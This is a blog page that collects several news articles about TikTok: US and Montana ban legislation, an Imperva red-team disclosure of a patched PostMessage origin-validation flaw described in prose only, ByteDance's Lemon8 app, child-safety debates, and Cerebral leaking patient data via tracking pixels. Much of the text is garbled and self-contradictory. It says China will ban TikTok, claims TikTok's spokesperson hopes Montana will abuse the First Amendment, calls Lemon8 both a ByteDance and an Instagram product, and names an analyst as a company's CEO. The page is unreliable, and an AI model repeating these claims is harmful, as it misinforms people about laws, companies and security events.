U.S.
Chinese Government Data Theft Privacy Social Media TikTok U.S.

Chinese Government to Ban TikTok Apps From Collecting U.S. Data

 


A spokesperson for TikTok issued a statement today responding to charges that the U.S. Congress was working to advance legislation. This would create another avenue for the US president to ban the popular video-sharing application from the country. 

There was a vote in the US House Foreign Affairs Committee earlier today that led to the passage of the Deterring America's Technological Adversaries (Data) Act. This would roll back US sanctions protections to creative content dating back 35 years to deter technological adversaries from targeting American institutions. Currently, the bill is being drafted in such a way that it would require the president to issue sweeping sanctions against Chinese companies that transfer personal data related to citizens of the US to organizations or individuals in China or "subject to the influence of China." 

The Coven tattoo studio owner is Angel Mae Glutz, who works in both fine art and tattooing. Most of Glutz's business is promoted on social media platforms, including TikTok. This has helped bring in clients from all over the world and promote her business. 

The ongoing battle on Capitol Hill between China-based TikTok and Congress may end up being a distraction for entrepreneurs like Glutz who rely on social media to market their businesses. Earlier this year, the White House banned TikTok's use on government devices and lawmakers are now considering legislation that would limit foreign adversaries' use of communication platforms and technology. 

Recently, many U.S. allies have expressed concerns about the video-sharing platform, most recently warning their staff to delete the app from their phones after the app caused an uproar among European Union institutions. In the Netherlands, the decision is being considered to follow the lead taken by Germany and Canada. 

According to CEO Shou Chew on Tuesday, TikTok now has 150 million monthly active users in the United States, which is a huge increase over the 40 million that the platform had earlier this year, while new calls are being made for its banning in the country. 

Generally speaking, TikTok poses a very low-risk danger to national security. This is in so far as the Chinese government can exercise influence over the app or its parent company which is not under its control. According to Chinese national security law, companies under its jurisdiction must comply with a wide variety of security activities under their jurisdiction to comply with the law. This is a serious issue since the public has little or no means to verify that leverage has been used in the way it has been described in the public domain. 

A violent border clash between India and China in 2020 caused a TikTok ban in India which in turn caused over 200 million TikTok users to be abruptly disconnected. Following the ban, TikTok has not returned to India. 

The United States, Canada, and the United Kingdom, among others, have recently enacted laws restraining TikTok use on official, government devices. However, they did not ban the app on personal devices. Last year, TikTok was found guilty of a massive data scandal. It was revealed that several employees accessed users' data, including journalists, as part of TikTok's effort to combat leaks in the media and crack down on them. 

These employees were terminated from the company according to the statement. There has been a sharp rise in the number of laws proposed by the U.S. to ban TikTok from the country completely. Other lawmakers have proposed mandating that ByteDance sell the video-sharing platform or ban the app completely.
Read more »
Vulnerabilities and Exploits
API Imperva Red message evet handler PostMessage API TikTok Vulnerabilities and Exploits

Imperva Red Team Patches a Privacy Vulnerability in TikTok


The Imperva Red Team has recently identified a vulnerability in TikTok, apparently allowing threat actors to look into users’ activities over both mobile and desktop devices.

The vulnerability, which has now been patched, was the result of a window message event handler's failure to accurately verify the message's origin, providing attackers access to users’ sensitive data.

PostMessage API 

The PostMessage API (also known as the HTML5 Web Messaging API) is a communication mechanism that permits safe cross-origin communication between several windows or iframes inside a web application. The API enables scripts from different origins to exchange messages, overcoming the restrictions the Same-Origin Policy imposes, that normally restricts data sharing between distinct sources on the web.

The API includes methods named window.postMessage() and an event message. The postMessage() method is used to send a message from the source window to the target window or iframe, while the message event is triggered on the receiving end when a new message is received. The team discovered a script in TikTok's web application during the code analysis that seemed to be involved in user tracking. 

The Imperva report states that “the first step in discovering the vulnerability was to identify all the message event handlers in TikTok's web application. This involved a comprehensive analysis of the source code in locating instances where the PostMessage API was being used[…]Once all the message event handlers were identified, we proceeded to carefully read and understand the code for each handler. This allowed us to determine the purpose of each handler and evaluate the security implications of processing untrusted messages.” 

Exploiting the Vulnerability 

Attackers could send harmful messages to the TikTok web application through the PostMessage API by taking advantage of this vulnerability and getting around the security precautions. The malicious message would then be processed by the message event handler as if it were from a reliable source, giving the attacker access to private user data.

The vulnerability was promptly addressed after being reported to TikTok by the Imperva Red Team, and Imperva appreciated TikTok for its swift action and cooperation. This disclosure should serve as a reminder of the value of adequate message origin validation and the risks of enabling interdomain communication without the necessary security precautions.  

Read more »
TikTok
Americal Civil Liberties Apple's Store Cyber space Cyberattacks Cyberfrauds FBI Google Play Privacy TikTok

The Montana Legislature Banned TikTok

 


A bill introduced in Montana would prevent apps like TikTok from being listed for download on app stores such as Google Play and Apple's App Store. The bill is forwarded to Republican Governor Gianforte for signature. 

TikTok, owned by Chinese investors, continues to be the target of fierce battles. As part of their efforts to address short-form video apps, Montana lawmakers voted on Friday to ban the most popular app from the state. 

Reuters writes that a bill would prevent applications like TikTok from being listed on apps stores, like Google Play or Apple's App Store in Montana. A 54-43 vote in the Montana House of Representatives approved the bill, SB419. Upon signing the bill, Gianforte will ensure it comes into effect in January. Despite the potential for substantial legal challenges, the legislation may still pass. 

However, there is nothing in the bill that makes it illegal for people who already use the app. This is regardless of the enacted law. The bill's original version forced internet providers to block TikTok. However, that particular language was removed, and it is not part of the amended bill. 

A state government has taken the first step in restricting TikTok in response to perceived security concerns since the legislation was passed. A national ban on TikTok seems to be on the cards after some federal lawmakers have called for an end to the app. 

A bill has been introduced targeting TikTok. It outlines the potential penalties imposed on the company if it violates the law daily. In addition to app stores that violate the law, penalties would also apply. As a result, users who access TikTok as part of their routine will not be penalized for doing so. 

As a result of allegations that TikTok's Chinese owner, ByteDance, places US users' personal information at risk for marketing purposes, the app has come under significant scrutiny from US legislators in recent months. Several congressmen have called for American data sharing with the Chinese government at the federal and state level. Last month, a congressional committee grilled TikTok CEO Shou Zi Chew on the issues widely held by the general public on social media.  

Numerous claims are being made against TikTok, including accusations of data theft, data mining, piracy, and data collection. However, TikTok has repeatedly denied these claims. To gain respect among US legislators, TikTok poured more than $1 billion into establishing a database where American users' data would be archived exclusively on Oracle's servers.

As acknowledged by its champions, the bill's supporters have no practical plans for operationalizing this attempt to censor American voices and therefore have no chance of succeeding. It has also been confirmed by TikTok's spokesperson Brooke Oberwetter that a court will decide whether the bill's constitutionality can stand up in court. Brooke hopes that the government of Montana will continue to abuse the First Amendment to keep TikTok users and creators in Montana from earning a living and protecting their rights under the First Amendment. 

Currently, the bill is being sent to the governor to be signed into law. There is a high probability that Republican governor Greg Gianforte will sign it. In Montana, TikTok has been banned from government devices because he previously banned it. Similar executive orders have been enacted by other states to ban the use of the app on devices and networks owned and operated by the government. 

Data safety concerns, surveillance by the Chinese government, and the involvement of minors in "dangerous activities" resulting from TikTok use were cited in the bill, which included a claim that minors were cooking chicken in NyQuil and climbing milk crates as dangerous activities. Critics of the app say that these activities were part of a set of challenges that had become popular. 

As a result of the links that TikTok's parent company, ByteDance, has with TikTok's parent company, the Chinese government has been widely expressed as having a potential risk of accessing user data from TikTok. 

In addition, they worry that this kind of information could be used by Chinese intelligence agencies or propaganda campaigns for their benefit. It is unclear whether the Chinese government has accessed or used any data related to TikTok's US users to influence them, and there has been no public evidence of this. According to Christopher Wray, Director of the FBI, the FBI does not believe many signs would be at first glance if this were to happen if it did happen. 

To make TikTok safer and more sustainable, the US government has called on its Chinese owners to spin off TikTok. In the context of its Project Texas initiative, TikTok says it can address national security concerns by installing a "firewall" around US users' data covering a wide area of cyberspace. 

Despite the uncertainty surrounding Montana's legislation's future, there is still hope for it. TikTok is a member of an industry group called NetChoice, which also has other technology companies in its membership. The group declared Friday that SB419 violates the US Constitution by trying to punish a person without a trial, or so-called "bills of attainment." 

It has been alleged by other civil society organizations that SB419 violates Montanans' rights to free expression as well as their access to information under the First Amendment. Earlier this week, the American Civil Liberties Union sent a letter to members of state legislatures in which the organization made the argument that government restrictions on freedom of speech must meet a high constitutional standard. 

As a result of SB 419, Montanans would be better off without a platform where they could speak out freely and exchange ideas daily; this would be censorship. 

According to the letter, if this becomes a law, it will set a dangerous precedent that government bodies will hold excessive control over Montanans’ access to the internet. According to Lynn Greenky, a First Amendment scholar and associate professor of Communication Studies at Syracuse University, the legislation also refers to "dangerous content" and "dangerous challenges" to TikTok phrases, raising an immediate "red flag" that will trigger a more thorough review of the bill. 

The bill sponsor, Shelley Vance, did not respond to a request for comment immediately after receiving it. In response to a question about Gianforte's comments, Gianforte's spokesperson failed to respond immediately. If the law is passed, the app ban will be implemented before 2024 begins. Several Congressmen are expressing concerns about the app as security concerns rise due to Chinese owners. As part of the Biden administration's warning issued last month, TikTok's parent company ByteDance, based in China, was told to divest ownership of the service or face a ban by the federal government.
Read more »
TikTok
ByteDance Cyberattack Privacies Technology TikTok

Lemon8 Enters US Top Charts With TikTok Parent

 


The company ByteDance, which owns TikTok's parent company ByteDance, released Lemon8, a social network app. Lemon8 boasts being one of this week's top 10 most downloaded apps on the US App Store. 

Lemon8 was released in Japan in 2020, and in February 2023, the US market will get the app from Beijing-based ByteDance.

Lemon8 has food, beauty, wellness, and travel videos and images you can share. There can be a comparison between it and Pinterest, or it can be described as a mix of both of them. 

During a hearing on March 24th, the US House Energy and Commerce Committee, which oversees energy and commerce in the federal government, questioned TikTok chief executive Shou Zi Chew regarding the short video app's data security policies. 

TikTok has quickly become one of the most popular short-form video apps in the U.S. when it comes to the battle for dominance in social media and short-form video content in the country. TikTok's features have been copied by others, which could give TikTok an edge if banned. 

TikTok-parent ByteDance has launched a social media app named Dots, which topped the charts on Apple's App Store for 3 days running. Despite TikTok being banned by the United States government, it is still available. 

As of April 2020, Lemon8, a social media service created by Meta-owned Instagram that launched globally in March 2020, jumped up to number 10 on the overall top chart in the US App Store. On yesterday's list of the highest-rated apps, excluding games, it was number 9.     

There is no doubt that this fast turnaround from being an unranked app to being No. 9 among the top free apps in the U.S. - ahead of YouTube, WhatsApp, Gmail, and Facebook - is an indication that the app publisher has been pushing hard to acquire millions of users in recent weeks and months. Currently, third-party analysts do not have any precise data about Lemon8's installs in the U.S. at the moment, because the app is so new to the App Store's Top Charts. They also do not know how Lemon8's installs have changed over the past few days because the app is so new to the App Store.   

According to Lemon8, which is pitched as a lifestyle community' app aimed at younger audiences, the platform is a content-sharing platform with an emphasis on video content. "The content displayed here is of the highest quality, authentic, and diverse, which is exactly what you will find here. This is the App Store page that said "A destination for sharing, discovering, and collaborating.". 

As ByteDance is facing tough regulatory turbulence in the West, some governments are imposing bans on its flagship TikTok app from official devices such as iPads and iPhones as a consequence of its recent surge in popularity. A few of these countries include the United Kingdom, the United States, Canada, and the European Union. 

As a result of the U.S. ban on TikTok, other social media platforms and video platforms could benefit as well. These platforms include Snapchat Inc. (NYSE: SNAP), YouTube, and Meta Platforms Inc.'s Facebook and Instagram companies, owned by Meta Platforms Inc. several Chinese mobile apps were downloaded in the U.S. during the first three weeks of March. A Chinese e-commerce company named Pinduoduo Inc (NASDAQ: PDD) owns and operates TEM U, an online marketplace for the U.S., which ranks at the top of the list. There were several ads featuring Temu in February that were aired before the Super Bowl.   

Deepwater Asset Management Managing Partner, Gene Munster, recently emphasized that two items should be considered when evaluating the possibility of banning TikTok. This is in the discussion. Munster said there is increased tension between the U.S. and China due to the ban discussion. As a result, the national youth could be endangered by platforms like TikTok, which allows for the production of short-form visual content.   

According to Munster, it has become a hot-button issue for some to investigate the impacts of short-form videos on mental health. 

Despite Munster's suggestion that companies such as Meta Platforms might benefit from a ban on TikTok, these companies may face pressure from Congress if a ban is enacted. This is due to TikTok's immense popularity in the long run. 

The company's chief executive officer, Gene Munster, warned that Snap and Meta Platforms, as well as its stock, may experience regulatory hurdles within the next few months as a result of upcoming regulatory changes. There is an effort in some states to limit how much time teenagers spend on social media and video apps as a result of the growing usage of these apps. 
Read more »
TikTok
Douyin Federal Trade Commission Policymaking process Privacy Shou Zi Chew Social Media Social Media Apps TikTok

Pleading TikTok to "Think of the Children" Misses the Point


In nearly every congress hearing on big tech, be it on privacy, monopoly, or in the case of last week’s TikTok hearing on national security, at least one lawmaker is seen to be concerned about something along with the lines of “But think of the kids!” 

In a recent hearing, a number of officials, including New Jersey Democrat Frank Melone, cited studies demonstrating that TikTok disseminates offensive material for children and teenagers. The site sends content about self-harm and eating disorders to children and young people every 2.6 minutes, or every eight minutes, according to a new study from the Center for Countering Digital Hate. The concern is furthered by the fact that TikTok is a popular platform choice among young users. According to a 2022 Pew Research Survey, the app was utilized by 67 percent of the teens polled, followed by YouTube. 

Callum Hood, research director at the Center for Countering Digital Hate, said in a press statement “Without legally mandated security through design, transparency, and accountability, the algorithm will continue to put vulnerable users at risk.” 

Although, Shou Zi Chew, CEO of TikTok noted that these are the issues that almost all major social media platforms have faced in recent years. These concerns are echoes of complaints that Meta has made in the past, particularly in connection to Instagram. 

When it comes to commenting on how harmful could a platform be to children, it often seems more of an attention-seeking tactic, highlighting some of the most common worries that American parents have. What kind of monster would not want to ensure that children are protected from exploitation and hazardous content? The attention paid to young users also presents one of the few open doors for bipartisan collaboration. 

But only a day before Chew was scheduled to testify before Congress, another gunshot forced students at Denver East High School to flee their classrooms. A pandemic-era program that provided free school meals to all children was phased away earlier this year in favor of a system based on income, which will put more obstacles in the way of the kids who need it the most. Due in large part to entrenched problems with economic inequality and a deteriorating social safety net, about one-third of children in the US live in poverty. 

Children are impacted by things like a lack of gun safety regulations and a lack of funding for social or educational initiatives, but these concerns frequently result in impasses in legislative and policymaking processes. Moreover, pleading with lawmakers to "think about the children" rarely has an impact. When it comes to Big Tech, the focus on "the kids" frequently oversimplifies and diverts attention from the more delicate issues of privacy, widespread data collection, the outsized power of certain companies to dominate smaller competitors, and the transnational nature of extremist content and misinformation. Instead, we need to ask deeper questions: How long should companies be able to keep data? What should it be used for? Can private companies that want to educate the next generation of consumers ever be incentivized to set time limits or restrict access to content for young users? Overall, how do our systems allow damage? 

There are certain ways that would get the concerns regarding children's well-being to light, practically protecting them. Although, it is rare to find favor in Congress. While officials may express concerns about how TikTok in the US differs from its Chinese counterpart, Douyin, in terms of the experience for young users, little has changed in legislation to address the online harms experienced by US children in the five years since the Tide Pod challenge or even the 18 months since Frances Haugen first testified before Congress, despite her frequent appearances on television hearings. 

In regard to these cases, Senators Edward J. Markey and Bill Cassidy are proposing a bipartisan bill for 2021 that would prohibit internet companies from gathering user data from users between the ages of 13 and 15 and establish a juvenile marketing and privacy branch at the Federal Trade Commission. However, the bill is yet to be voted on in the Senate.  

Read more »
TikTok
Data Breach Data Leak Data Security Data Google Meta Security TikTok

Cerebral Admits to Revealing Patient Information to Meta, TikTok, and Google

 

As per TechCrunch, Cerebral, a telehealth startup specialising in mental health, inadvertently shared sensitive information of over 3.1 million patients with Google, Meta, TikTok, and other third-party advertisers. Cerebral admits to exposing a slew of patient data with the tracking tools it's been using since October 2019 in a notice posted on the company's website. 

Patient names, phone numbers, email addresses, birth dates, IP addresses, insurance information, appointment dates, treatment, and other information are all impacted by the oversight. It is possible that the answers clients provided as part of the mental health self-assessment were exposed on the company's website and app, which patients can use to schedule therapy appointments and receive prescription medication.

Cerebral claims that this data was gathered through the use of tracking pixels, which are pieces of code that Meta, TikTok, and Google allow developers to embed in their apps and websites. For example, the Meta Pixel can gather information about a user's activity on a website or app after clicking an ad on the platform, and it can even keep track of the information a user fills out on an online form. While this allows companies like Cerebral to track how users interact with their ads on various platforms and the actions they take as a result, it also gives Meta, TikTok, and Google access to this data, which they can then use to gain insight into their own users.

Cerebral notes that the exposed information may "vary" from patient to patient depending on a variety of factors such as "what actions individuals took on Cerebral's Platforms, the nature of the services provided by the Subcontractors, the configuration of Tracking Technologies," and more. The company says it will notify affected users and that "regardless of how an individual interacted with Cerebral's platform," no social security numbers, credit card numbers, or bank account information were exposed.
Cerebral says it has "disabled, reconfigured, and/or removed" any tracking pixels on the platform to prevent future exposures and has "enhanced" its "information security policies and technology vetting processes" since discovering the security hole in January.

Cerebral is required by law to report potential HIPAA violations. HIPAA stands for Health Insurance Portability and Accountability Act. This prohibits healthcare providers from disclosing patient information to anyone other than the patient or anyone the patient has given permission to receive health information. The US Office for Civil Rights is currently investigating the breach, which follows similar incidents involving pixel-tracking tools.

An investigation by The Markup last year discovered that some of the nation's top hospitals were sending sensitive patient information to Meta via the company's pixel. Two class-action lawsuits were filed, accusing that Meta and the hospitals in question violated medical privacy laws.

The Markup discovered months later that Meta was able to obtain financial information about users via tracking tools embedded in popular tax services such as H&R Block, TaxAct, and TaxSlayer. Meanwhile, other online medical companies, such as BetterHelp and GoodRx, were fined by the FTC earlier this year for sharing sensitive patient data with third parties.

Cerebral is being investigated by the Department of Justice and the Drug Enforcement Administration for prescribing controlled substances such as Adderall and Xanax, in addition to whether or not it violated HIPAA regulations. It has since stopped prescribing these medications.
Read more »
Subscribe to: Comments (Atom)